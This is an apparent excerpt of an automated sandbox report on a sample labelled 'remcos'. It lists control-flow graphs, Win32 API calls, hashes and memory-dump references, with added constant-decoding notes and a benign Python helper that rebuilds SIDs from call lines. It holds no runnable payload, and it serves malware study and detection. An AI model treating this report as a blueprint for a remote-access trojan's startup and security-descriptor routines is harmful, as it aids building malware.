• Instruction Fuzzy Hash: 9BF09A7164424E9BD7129B75AE58B3B7AF5FBA5345F080432EA00D6AA0EF30C482DB90

Control-flow Graph

control_flow_graph 544 1f9330-1f9361 call 1f9e35 call 1f9ee8 GetStartupInfoW 550 1f9363-1f9372 544->550 551 1f938c-1f938e 550->551 552 1f9374-1f9376 550->552 555 1f938f-1f9395 551->555 553 1f937f-1f938a Sleep 552->553 554 1f9378-1f937d 552->554 553->550 554->555 556 1f9397-1f939f _amsg_exit 555->556 557 1f93a1-1f93a7 555->557 558 1f93db-1f93e1 556->558 559 1f93a9-1f93c2 call 1f9519 557->559 560 1f93d5 557->560 562 1f93fe-1f9400 558->562 563 1f93e3-1f93f4 _initterm 558->563 559->558 569 1f93c4-1f93d0 559->569 560->558 565 1f940b-1f9412 562->565 566 1f9402-1f9409 562->566 563->562 567 1f9437-1f9441 565->567 568 1f9414-1f9421 call 1f9d40 565->568 566->565 571 1f9444-1f9449 567->571 568->567 576 1f9423-1f9435 568->576 572 1f9509-1f9518 569->572 574 1f944b-1f944d 571->574 575 1f9495-1f9498 571->575 579 1f944f-1f9451 574->579 580 1f9464-1f9468 574->580 577 1f949a-1f94a3 575->577 578 1f94a6-1f94b3 _ismbblead 575->578 576->567 581 1f94b9-1f94bd 578->581 582 1f94b5-1f94b6 578->582 579->575 583 1f9453-1f9455 579->583 584 1f946a-1f946e 580->584 585 1f9470-1f9472 580->585 581->571 582->581 583->580 588 1f9457-1f945a 583->588 586 1f9473-1f947b call 1f7d41 584->586 585->586 591 1f9480-1f948c 586->591 588->580 590 1f945c-1f9462 588->590 590->583 592 1f94ee-1f94f5 591->592 593 1f948e-1f948f exit 591->593 594 1f94f7-1f94fd _cexit 592->594 595 1f9502 592->595 593->575 594->595 595->572
APIs
  • Part of subcall function 001F9E35: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 001F9E62
  • Part of subcall function 001F9E35: GetCurrentProcessId.KERNEL32 ref: 001F9E71
  • Part of subcall function 001F9E35: GetCurrentThreadId.KERNEL32 ref: 001F9E7A
  • Part of subcall function 001F9E35: GetTickCount.KERNEL32 ref: 001F9E83
  • Part of subcall function 001F9E35: QueryPerformanceCounter.KERNEL32(?), ref: 001F9E98
• GetStartupInfoW.KERNEL32(?,001FA310,00000058), ref: 001F934F
• Sleep.KERNEL32(000003E8), ref: 001F9384
• _amsg_exit.MSVCRT ref: 001F9399
• _initterm.MSVCRT ref: 001F93ED
• __IsNonwritableInCurrentImage.LIBCMT ref: 001F9419
• exit.MSVCRT ref: 001F948F
• _ismbblead.MSVCRT ref: 001F94AA
Similarity
• API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
• String ID:
• API String ID: 836923961-0
• Opcode ID: 561766947b446bf8a71d6af851b2debe394f2ffe87521e7abf37bcddee7e74b7
• Instruction ID: eb160319ccf7491ad0a33f345b87bc9f2e38ee415372be51056419a1d1e226b7
• Opcode Fuzzy Hash: 561766947b446bf8a71d6af851b2debe394f2ffe87521e7abf37bcddee7e74b7
• Instruction Fuzzy Hash: 6B41147194431DDFDB25BFA4EA147B9B7A5FB54720F20001AEB42D76D1CB704882DB80

Control-flow Graph

control_flow_graph 596 1f915b-1f9194 call 1f90e9 599 1f9196-1f91bf LdrResolveDelayLoadedAPI 596->599 600 1f91c4-1f91d8 596->600 608 1f9267-1f926b 599->608 601 1f91dd-1f91df 600->601 602 1f91da 600->602 604 1f924d-1f9256 GetProcAddress 601->604 605 1f91e1-1f91ee LoadLibraryExA 601->605 602->601 606 1f925f-1f9261 DelayLoadFailureHook 604->606 607 1f9258-1f925d 604->607 605->606 609 1f91f0-1f9200 605->609 606->608 607->608 610 1f9202-1f922b 609->610 611 1f9240-1f9246 FreeLibrary 609->611 612 1f922d-1f923e 610->612 613 1f9249-1f924b 610->613 611->613 612->613 613->604 613->606
APIs
• LdrResolveDelayLoadedAPI.NTDLL ref: 001F91BD
• LoadLibraryExA.KERNEL32(?), ref: 001F91E4
• GetProcAddress.KERNEL32(?,?), ref: 001F924F
Strings
Similarity
• API ID: AddressDelayLibraryLoadLoadedProcResolve
• String ID: $
• API String ID: 570722585-3993045852
• Opcode ID: 1afb57c27087c4580a9c40c05ad3ba46ab3391dbd2b986d4936306047dca67a0
• Instruction ID: 036f8c05a17cd0580fa1a669623fdc32288e277d97687670b14a3fe5a4b47cb4
• Opcode Fuzzy Hash: 1afb57c27087c4580a9c40c05ad3ba46ab3391dbd2b986d4936306047dca67a0
• Instruction Fuzzy Hash: F831A171A00219AFCB05EFA9DC44BBEBBF5EF48754F148069E909E7251DB309D41CB90

Control-flow Graph

control_flow_graph 616 1f43a0-1f43ea call 1fa18c call 1f878a 621 1f45aa-1f45d4 call 1f87d4 * 2 616->621 622 1f43f0-1f43ff call 1f878a 616->622 622->621 628 1f4405-1f4444 call 1f878a 622->628 633 1f459f-1f45a5 call 1f87d4 628->633 634 1f444a-1f445f GetModuleFileNameW 628->634 633->621 634->633 635 1f4465-1f44c8 call 1f8c90 634->635 635->633 640 1f44ce-1f44db 635->640 641 1f44dd-1f44f4 GlobalAlloc 640->641 642 1f44f6-1f44f9 640->642 643 1f44ff-1f4501 641->643 642->643 644 1f4658-1f465a 643->644 645 1f4507-1f450c 643->645 648 1f4596-1f459c 644->648 649 1f4660-1f4661 644->649 646 1f450e-1f4515 GlobalFree 645->646 647 1f451b-1f4541 call 1f8cd0 645->647 646->647 653 1f4547-1f456f 647->653 654 1f45d5-1f45d7 647->654 648->633 650 1f4590 GlobalFree 649->650 650->648 660 1f4588-1f458b 653->660 664 1f4571-1f4578 653->664 655 1f45d9-1f45fe call 1f2e35 654->655 655->660 661 1f4600-1f462b call 1f2e35 655->661 660->648 663 1f458d 660->663 667 1f462d-1f4637 661->667 668 1f4639-1f463b 661->668 663->650 664->660 665 1f457a-1f4586 664->665 665->655 667->668 669 1f463c-1f4653 667->669 668->669 669->660
APIs
  • Part of subcall function 001F878A: GlobalAlloc.KERNEL32(00000040,00000000,00000000,00000001,00000000,?,001F5E28,00000100), ref: 001F87A2
  • Part of subcall function 001F878A: GlobalFree.KERNEL32(?), ref: 001F87C0
• GetModuleFileNameW.KERNEL32(?,00000104,00000104,?,?,00001388,?,001FA2B0,000000A8,001F6E7E,00000000,00000000,?), ref: 001F4457
• GlobalAlloc.KERNEL32(00000040,00000000,?,?,00001388,?,001FA2B0,000000A8,001F6E7E,00000000,00000000,?), ref: 001F44E0
• GlobalFree.KERNEL32(?), ref: 001F450F
• GlobalFree.KERNEL32(?), ref: 001F4590
Strings
Similarity
• API ID: Global$Free$Alloc$FileModuleName
• String ID: %d.%d.%.4d.%d
• API String ID: 906160587-3399825337
• Opcode ID: 44b372ef6cb6023f0bf35e2cda1a85bbc4e1e6b4ef876f8f26a0bb2d7c1aca5c
• Instruction ID: 5a501b10036aff6e55fea1391b34e34b72107ad4f1f8f4a2eea6a13046d56b76
• Opcode Fuzzy Hash: 44b372ef6cb6023f0bf35e2cda1a85bbc4e1e6b4ef876f8f26a0bb2d7c1aca5c
• Instruction Fuzzy Hash: 5A7168B5A0032C9FDB24DB64DD45BBEBBB9EF45310F1041A9AA49A32A1DB304E84CF11

Control-flow Graph (figure omitted)

APIs
• GlobalAlloc.KERNEL32(00000040,00000000,?,?,00001388,?,001FA2B0,000000A8,001F6E7E,00000000,00000000,?), ref: 001F44E0
• GlobalFree.KERNEL32(?), ref: 001F450F
• GlobalFree.KERNEL32(?), ref: 001F4590
Similarity
• API ID: Global$Free$Alloc
• String ID: %d.%d.%.4d.%d
• API String ID: 1780285237-3399825337
• Opcode ID: edda84bd06cd8b3f087cefca05fa5a868b3fccf606c8c18090eb6de6e9499a93
• Instruction ID: a032b32ab2e23c6c258cab7c2ab4d6c4d5fcfb68a599f0b157caa6b31670c3c5
• Opcode Fuzzy Hash: edda84bd06cd8b3f087cefca05fa5a868b3fccf606c8c18090eb6de6e9499a93
• Instruction Fuzzy Hash: 99414A71E0022C9FDB24DB65CD45BBEBBB9EF44310F2041A9E649A72A1DB305E85CF50

Control-flow Graph (figure omitted)

APIs
• Sleep.KERNEL32(0000000A), ref: 001F8C1F
• GetProcAddress.KERNEL32(?), ref: 001F8C68
Similarity
• API ID: AddressProcSleep
• String ID: VERSION
• API String ID: 1175476452-2153328089
• Opcode ID: 6a2794e342263911099ff3fe28ed917754658d568faeac785e6d89d25beb152f
• Instruction ID: bd036e6cc41c808c6d8470f1c999d01ea8c4646e0f7bf8a3e93ab24c6bf9007e
• Opcode Fuzzy Hash: 6a2794e342263911099ff3fe28ed917754658d568faeac785e6d89d25beb152f
• Instruction Fuzzy Hash: 9B01B1716052199FDB189B35DE196BE7AA9DB81360F08043EE645E7250EF70DC81C7E0

Control-flow Graph (figure omitted)

APIs
  • Part of subcall function 001F8BFD: Sleep.KERNEL32(0000000A), ref: 001F8C1F
  • Part of subcall function 001F8BFD: GetProcAddress.KERNEL32(?), ref: 001F8C68
• GetFileVersionInfoW.KERNELBASE ref: 001F8D03
Similarity
• API ID: AddressFileInfoProcSleepVersion
• String ID: GetFileVersionInfoW
• API String ID: 3824450226-2839375084
• Opcode ID: 3bc41197fd92aa0920ab359d1b998fb9103247bc8f5877da50423dda73d4040a
• Instruction ID: 1343e40a60192fe8de26468b7e2278a0b885f7e436bd26ac53e6ff7982488ffd
• Opcode Fuzzy Hash: 3bc41197fd92aa0920ab359d1b998fb9103247bc8f5877da50423dda73d4040a
• Instruction Fuzzy Hash: 03E0E63624411DA78F155F95DD0497B7F66EF94350B044421FA1A52560DF31DC21E7E4

Control-flow Graph (figure omitted)

APIs
  • Part of subcall function 001F7D1B: SetProcessMitigationPolicy.KERNEL32(00000000,?,00000008,?,?,?,001F7D64,001FA2D0,00000024,001F9480,001F0000,00000000,00000002,0000000A), ref: 001F7D39
  • Part of subcall function 001F63E3: GetVersionExW.KERNEL32(?), ref: 001F6434
  • Part of subcall function 001F63E3: GetCurrentProcess.KERNEL32(0000001A,?,00000004,00000000), ref: 001F6456
  • Part of subcall function 001F63E3: NtQueryInformationProcess.NTDLL ref: 001F645D
  • Part of subcall function 001F63E3: GetCommandLineW.KERNEL32 ref: 001F649F
  • Part of subcall function 001F63E3: GetStdHandle.KERNEL32(000000F5), ref: 001F64F3
  • Part of subcall function 001F63E3: GetFileType.KERNEL32(00000000), ref: 001F6504
  • Part of subcall function 001F63E3: memset.MSVCRT ref: 001F652B
  • Part of subcall function 001F63E3: memset.MSVCRT ref: 001F653D
• ExitProcess.KERNEL32 ref: 001F7DC9
Similarity
• API ID: Process$memset$CommandCurrentExitFileHandleInformationLineMitigationPolicyQueryTypeVersion
• String ID:
• API String ID: 3041573362-3916222277
• Opcode ID: ec23cdebf7389f6cda0929e584395cf2743fc92962aa645a960f78f9636279e5
• Instruction ID: 693b214b866d94b9ba289267499682940fa03585d0b908d35de8240ec1558993
• Opcode Fuzzy Hash: ec23cdebf7389f6cda0929e584395cf2743fc92962aa645a960f78f9636279e5
• Instruction Fuzzy Hash: 86F0F87191620CABDB00EFA0D9497FC7AB5BF18311F604044E20576191CB750E04DB61

Control-flow Graph (figure omitted)

APIs
  • Part of subcall function 001F8BFD: Sleep.KERNEL32(0000000A), ref: 001F8C1F
  • Part of subcall function 001F8BFD: GetProcAddress.KERNEL32(?), ref: 001F8C68
• GetFileVersionInfoSizeW.KERNELBASE ref: 001F8CBD
Strings
• GetFileVersionInfoSizeW, xrefs: 001F8C9A
Similarity
• API ID: AddressFileInfoProcSizeSleepVersion
• String ID: GetFileVersionInfoSizeW
• API String ID: 1244426142-1049618512
• Opcode ID: a91ce848c837343a51f7afe7ba692bc358f8839c6cd335b6fca7c7d4ec60d840
• Instruction ID: e5cde0878b66c8a5cc7e38f31f6a3cf9e2250e33dc3d031765fc6c50112cf531
• Opcode Fuzzy Hash: a91ce848c837343a51f7afe7ba692bc358f8839c6cd335b6fca7c7d4ec60d840
• Instruction Fuzzy Hash: F2D05E3570421C678B146BA1ED048BB7F6AEB95360B148031FE19A37A0CF31ED51E7E0

Control-flow Graph (figure omitted)

APIs
• memset.MSVCRT ref: 001F90B2
  • Part of subcall function 001F9002: lstrlenW.KERNEL32(OLEAUT32.dll,00000000,OLEAUT32.dll,00000000,001F90C6,0000020A,?), ref: 001F9019
• LoadLibraryW.KERNELBASE(?), ref: 001F90D3
Similarity
• API ID: LibraryLoadlstrlenmemset
• String ID:
• API String ID: 3555077121-0
• Opcode ID: aed62fcaef0f2aa601c44456db1b437b500854a103f82ce82cb2eb3ed4cc3319
• Instruction ID: c6627272e00d985547b2a9579b8ed7959aad5881dfdc75bb2f04fedf76814a8f
• Opcode Fuzzy Hash: aed62fcaef0f2aa601c44456db1b437b500854a103f82ce82cb2eb3ed4cc3319
• Instruction Fuzzy Hash: CCF0273160430C9BCB24FB34D84EBFE37A8AB18300F50049AF51A971C0EFB0AE88C990

Control-flow Graph (figure omitted)

APIs
• SetProcessMitigationPolicy.KERNEL32(00000000,?,00000008,?,?,?,001F7D64,001FA2D0,00000024,001F9480,001F0000,00000000,00000002,0000000A), ref: 001F7D39
                                                                                                                                Similarity
                                                                                                                                • API ID: MitigationPolicyProcess
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1088084561-0
                                                                                                                                • Opcode ID: cad21ba0526ab535567148da73156599e800d8bccde8f578e51db4f7afd6698e
                                                                                                                                • Instruction ID: 3bb6fe9d7cae398952313b9bd6b74fca48e314e9c46ed9c47575a3bfaa3d5437
                                                                                                                                • Opcode Fuzzy Hash: cad21ba0526ab535567148da73156599e800d8bccde8f578e51db4f7afd6698e
                                                                                                                                • Instruction Fuzzy Hash: 8FD09EB0514248BEEB48CB95D80EFAE7EACE744314F10419DB04593281EAF16A459765

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 775 1f7db7-1f7dc9 call 1f8f5a ExitProcess
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2194381605.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                • Associated: 00000009.00000002.2194360866.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000009.00000002.2194413421.00000000001FD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000009.00000002.2194413421.00000000001FF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_1f0000_remcos.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ExitProcess
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 621844428-0
                                                                                                                                • Opcode ID: be1e7c4e767d75fecdb5ee1d0bad211457be1e2943492cff0c5ed98092fd5a23
                                                                                                                                • Instruction ID: 5b66a22c8545879fd00ed8c7623cfea3901f642dda3d0fe98a44aaaeeade148e
                                                                                                                                • Opcode Fuzzy Hash: be1e7c4e767d75fecdb5ee1d0bad211457be1e2943492cff0c5ed98092fd5a23
                                                                                                                                • Instruction Fuzzy Hash: 1CB09B71C05209DFCF009FB0D9070AC7B31BF54321F100240D921321A0C7310D70DA71

Control-flow Graph: 779 1f87d4-1f87dd; 780 1f87df-1f87e1 GlobalFree; 781 1f87e7-1f87f4; edges 779->780, 779->781, 780->781
Memory Dump Source
• Source File: 00000009.00000002.2194381605.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true
• Associated: 00000009.00000002.2194360866.00000000001F0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000009.00000002.2194413421.00000000001FD000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000009.00000002.2194413421.00000000001FF000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_1f0000_remcos.jbxd
Similarity
• API ID: FreeGlobal
• String ID:
• API String ID: 2979337801-0
• Opcode ID: 3fc530449f6b956998685460263aab840c9904894871bd0abf89a95d6ab37125
• Instruction ID: 52467e73404a24a837d2a7dbea7a80c06a50c01b1654b8cffea8f13cfd2c9b25
• Opcode Fuzzy Hash: 3fc530449f6b956998685460263aab840c9904894871bd0abf89a95d6ab37125
• Instruction Fuzzy Hash: 31D01271011625CFD7309F14E508DA2BBE5EF40718F21886EE4E983510DB72E88ACB40
APIs
• FreeSid.ADVAPI32(?), ref: 001F3256
• AllocateAndInitializeSid.ADVAPI32(?,00000001,00000004,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 001F3274
• FreeSid.ADVAPI32(?), ref: 001F3292
• AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 001F32B0
• FreeSid.ADVAPI32(?), ref: 001F32CE
• AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 001F32F0
• FreeSid.ADVAPI32(?), ref: 001F330E
• AllocateAndInitializeSid.ADVAPI32(?,00000001,00000013,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 001F332C
• FreeSid.ADVAPI32(?), ref: 001F334A
• AllocateAndInitializeSid.ADVAPI32(?,00000001,00000014,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 001F3368
• FreeSid.ADVAPI32(?), ref: 001F33CF
• AllocateAndInitializeSid.ADVAPI32(?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 001F33EC
• FreeSid.ADVAPI32(?), ref: 001F340A
• AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 001F3428
• FreeSid.ADVAPI32(?), ref: 001F3446
• AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 001F3468
• FreeSid.ADVAPI32(?), ref: 001F34A2
• AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 001F34C0
• FreeSid.ADVAPI32(?), ref: 001F34DE
• AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 001F3500
• FreeSid.ADVAPI32(?), ref: 001F3548
• AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 001F3566
• FreeSid.ADVAPI32(?), ref: 001F3584
• AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 001F35A6
• FreeSid.ADVAPI32(?), ref: 001F35C4
• AllocateAndInitializeSid.ADVAPI32(?,00000001,00000004,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 001F35E2
• FreeSid.ADVAPI32(?), ref: 001F3628
• AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 001F3646
• FreeSid.ADVAPI32(?), ref: 001F3664
• AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 001F3686
• FreeSid.ADVAPI32(?), ref: 001F36AE
• AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 001F36CC
• FreeSid.ADVAPI32(?), ref: 001F36EA
• AllocateAndInitializeSid.ADVAPI32(?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 001F3707
• FreeSid.ADVAPI32(?), ref: 001F3725
• AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 001F3747
• GetLengthSid.ADVAPI32(?), ref: 001F37A0
• memset.MSVCRT ref: 001F37C5
• GlobalAlloc.KERNEL32(00000000,?), ref: 001F37E8
• InitializeAcl.ADVAPI32(?,?,00000002), ref: 001F3816
• AddAccessAllowedAce.ADVAPI32(?,00000002,?,?), ref: 001F3842
• GetAce.ADVAPI32(?,?,?), ref: 001F385D
• InitializeSecurityDescriptor.ADVAPI32(?,00000001), ref: 001F3887
• SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 001F389D
• SetSecurityDescriptorOwner.ADVAPI32(?,?,00000000), ref: 001F38AE
• SetSecurityDescriptorGroup.ADVAPI32(?,?,00000000), ref: 001F38C7
• GetSecurityDescriptorLength.ADVAPI32(?), ref: 001F38D6
• MakeSelfRelativeSD.ADVAPI32(?,?,?), ref: 001F38F3
• GetLastError.KERNEL32 ref: 001F38FD
• GlobalFree.KERNEL32(?), ref: 001F3918
• GetLastError.KERNEL32 ref: 001F3920
• FreeSid.ADVAPI32(?), ref: 001F393D
  Decoded constants: the routine builds a security descriptor (SECURITY_DESCRIPTOR_REVISION = 1, ACL_REVISION = 2, GlobalAlloc flags 0 = GMEM_FIXED) with an explicit DACL, owner and group, then converts it to self-relative form. The AllocateAndInitializeSid sub-authorities seen are 0x4 (INTERACTIVE), 0x12 (SYSTEM), 0x13 (LOCAL SERVICE), 0x14 (NETWORK SERVICE) and 0x20/0x220 (BUILTIN\Administrators), all well-known under SECURITY_NT_AUTHORITY. The pIdentifierAuthority pointer is unresolved ('?'), so the two RID-0 calls cannot be mapped from this listing alone (S-1-5-0 is not a defined well-known SID; Everyone is S-1-1-0 under SECURITY_WORLD_SID_AUTHORITY). Only one AddAccessAllowedAce call appears, so which SID ends up in the DACL and with what access mask has to be taken from the disassembly, not from the call list.
Memory Dump Source
• Source File: 00000009.00000002.2194381605.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true
• Associated: 00000009.00000002.2194360866.00000000001F0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000009.00000002.2194413421.00000000001FD000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000009.00000002.2194413421.00000000001FF000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_1f0000_remcos.jbxd
Similarity
• API ID: FreeInitialize$Allocate$DescriptorSecurity$ErrorGlobalLastLength$AccessAllocAllowedDaclGroupMakeOwnerRelativeSelfmemset
• String ID:
• API String ID: 3802846876-0
• Opcode ID: 139c35418e6bae600f47f6ff3ad380a3c78d2ff5486e310ad909f77fae8b5500
• Instruction ID: 7e790407e21e93967271c2b00b2b3ad092c0c80ac6ba6dc00deaa3b0c07afddc
• Opcode Fuzzy Hash: 139c35418e6bae600f47f6ff3ad380a3c78d2ff5486e310ad909f77fae8b5500
• Instruction Fuzzy Hash: 00123971508349AFDB309F60DC88BBBB7E9FB84745F10482DB699C2260DB71D945CB52
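Added example (not part of the sandbox report and not code from the analysed sample): a small Python helper that takes AllocateAndInitializeSid call lines in the format of the listing above and reconstructs the SID string each call builds, mapping the well-known ones to account names. The sample input is a constructed copy of six call lines from the listing. Because the sandbox prints the pIdentifierAuthority pointer as '?', the authority is an assumed parameter that defaults to SECURITY_NT_AUTHORITY (5); the well-known SID table and the 11-argument prototype are from the Win32 documentation.

```python
import re

# Constructed sample input: AllocateAndInitializeSid lines copied from the
# sandbox listing above ('?' marks pointers the sandbox did not resolve).
SAMPLE_CALLS = """\
AllocateAndInitializeSid.ADVAPI32(?,00000001,00000004,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 001F3274
AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 001F32B0
AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 001F32F0
AllocateAndInitializeSid.ADVAPI32(?,00000001,00000013,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 001F332C
AllocateAndInitializeSid.ADVAPI32(?,00000001,00000014,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 001F3368
AllocateAndInitializeSid.ADVAPI32(?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 001F33EC
"""

SECURITY_WORLD_SID_AUTHORITY = 1
SECURITY_NT_AUTHORITY = 5

# Well-known SIDs relevant to this listing (from the Windows well-known SID list).
WELL_KNOWN = {
    "S-1-1-0": "Everyone",
    "S-1-5-4": "NT AUTHORITY\\INTERACTIVE",
    "S-1-5-18": "NT AUTHORITY\\SYSTEM",
    "S-1-5-19": "NT AUTHORITY\\LOCAL SERVICE",
    "S-1-5-20": "NT AUTHORITY\\NETWORK SERVICE",
    "S-1-5-32-544": "BUILTIN\\Administrators",
}

CALL_RE = re.compile(
    r"AllocateAndInitializeSid\.ADVAPI32\(([^)]*)\),\s*ref:\s*([0-9A-Fa-f]+)"
)


def parse_sid_calls(listing, authority=SECURITY_NT_AUTHORITY):
    """Reconstruct the SID built by each AllocateAndInitializeSid call.

    Returns a list of (ref, sid_string, account_name_or_None).  The
    identifier authority is an assumption (the listing shows '?'); the
    default of 5 (SECURITY_NT_AUTHORITY) fits every RID here except 0.
    """
    out = []
    for m in CALL_RE.finditer(listing):
        args = [a.strip() for a in m.group(1).split(",")]
        # Prototype: (pIdentifierAuthority, nSubAuthorityCount,
        #             dwSubAuthority0..7, pSid) -> 11 arguments.
        if len(args) != 11:
            raise ValueError(f"unexpected argument count at ref {m.group(2)}")
        count = int(args[1], 16)
        if not 1 <= count <= 8:
            raise ValueError(f"invalid nSubAuthorityCount {count} at ref {m.group(2)}")
        subs = [int(a, 16) for a in args[2:2 + count]]  # only the used sub-authorities
        sid = "S-1-%d-%s" % (authority, "-".join(str(s) for s in subs))
        out.append((m.group(2).upper(), sid, WELL_KNOWN.get(sid)))
    return out


def unresolved_sids(results):
    """SIDs that are not well-known under the assumed authority; these are
    the calls where the authority guess is most likely wrong."""
    return [sid for _, sid, name in results if name is None]


if __name__ == "__main__":
    rows = parse_sid_calls(SAMPLE_CALLS)
    for ref, sid, name in rows:
        print(f"{ref}  {sid:<14}  {name or '(not well-known under S-1-5)'}")
    print("unresolved:", unresolved_sids(rows))
```

Running it over the six sample lines resolves five principals (INTERACTIVE, SYSTEM, BUILTIN\Administrators, LOCAL SERVICE, NETWORK SERVICE) and flags the RID-0 call as unresolved under S-1-5; re-running with authority=SECURITY_WORLD_SID_AUTHORITY maps that same call to Everyone, which is the check worth doing against the disassembly before writing up what the DACL grants.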
APIs
• GetLastError.KERNEL32(00000020,00000000,00000000), ref: 001F5A12
• RegQueryValueExW.ADVAPI32(?,Debug,00000000,00000000,?,?), ref: 001F5A8A
• RegCloseKey.ADVAPI32(?), ref: 001F5AAA
• GlobalFree.KERNEL32(?), ref: 001F5ABF
• RegCreateKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Installer\CA,00000000,00000000,00000000,00020006,00000000,?,00000000), ref: 001F5B14
• RegSetValueExW.ADVAPI32(?,LastError,00000000,00000004,?,00000004), ref: 001F5B35
• lstrlenW.KERNEL32(ServerMain (CA): Open synchronization event failed), ref: 001F5B3C
• RegSetValueExW.ADVAPI32(?,LastErrorMessage,00000000,00000001,ServerMain (CA): Open synchronization event failed,00000000), ref: 001F5B59
• RegCloseKey.ADVAPI32(?), ref: 001F5B65
• memset.MSVCRT ref: 001F5B84
• OutputDebugStringW.KERNEL32(?), ref: 001F5BD4
• SetLastError.KERNEL32(00000000), ref: 001F5BDB
  • Part of subcall function 001F2F5E: RegOpenKeyExW.ADVAPI32(80000002,Software\Policies\Microsoft\Windows\Installer,00000000,00020019,001F5A48,?,001F5A48,?,?,?), ref: 001F2F8B
  Decoded constants: RegCreateKeyExW opens HKEY_CURRENT_USER (0x80000001) with KEY_WRITE (0x20006) and stores LastError as REG_DWORD (type 4) and LastErrorMessage as REG_SZ (type 1); the subcall reads HKEY_LOCAL_MACHINE (0x80000002) with KEY_READ (0x20019) and queries a "Debug" value under the Installer policy key, which gates the OutputDebugStringW output. The registry paths and the "ServerMain (CA)" message follow Windows Installer custom-action (CA) server conventions; the snapshot label ("remcos") comes from the detection on this process, so compare this routine against a clean Windows Installer binary before treating it as RAT-specific logic. On a suspect host, the HKCU\...\Installer\CA values are worth collecting because they record the last error this code path hit.
Memory Dump Source
• Source File: 00000009.00000002.2194381605.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true
• Associated: 00000009.00000002.2194360866.00000000001F0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000009.00000002.2194413421.00000000001FD000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000009.00000002.2194413421.00000000001FF000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_1f0000_remcos.jbxd
Similarity
• API ID: Value$CloseErrorLast$CreateDebugFreeGlobalOpenOutputQueryStringlstrlenmemset
• String ID: %s$($Debug$Error: %d. %s.$LastError$LastErrorMessage$P$ServerMain (CA): Open synchronization event failed$Software\Microsoft\Windows\CurrentVersion\Installer\CA$Software\Policies\Microsoft\Windows\Installer
• API String ID: 3407900974-1723650419
• Opcode ID: 8e3eb73b24bc4fd7fb1cc2c432694714aa029d1b26c95e36f4de618cfa57f804
• Instruction ID: 5d6c50a38a894805a42772d616874b80e58b3844e9155567a1d946ef7acf5b01
• Opcode Fuzzy Hash: 8e3eb73b24bc4fd7fb1cc2c432694714aa029d1b26c95e36f4de618cfa57f804
